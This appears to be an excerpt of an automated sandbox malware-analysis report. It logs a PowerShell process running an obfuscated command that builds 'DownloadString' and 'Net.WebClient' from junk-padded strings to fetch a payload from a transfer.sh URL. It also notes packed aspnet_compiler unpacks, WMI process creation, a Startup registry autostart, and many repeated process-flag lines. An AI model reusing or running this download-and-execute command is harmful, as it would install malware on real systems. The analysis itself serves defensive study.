-f')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_e)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_b)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_C)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_l)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_l)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_o)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_a)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_d)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_',''),'67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-s67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-t67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-r67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-i67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-n67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-g67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-',''),'%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_e)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_b)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_C)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_l)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 10_2_00007FF9ECE81E28 pushad ; retf

10_2_00007FF9ECE81E29

Source: 11.0.aspnet_compiler.exe.400000.4.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	High entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	High entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'
Source: 11.0.aspnet_compiler.exe.400000.2.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	High entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'
Source: 11.0.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	High entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'
Source: 11.0.aspnet_compiler.exe.400000.3.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	High entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'
Source: 11.0.aspnet_compiler.exe.400000.1.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs	High entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
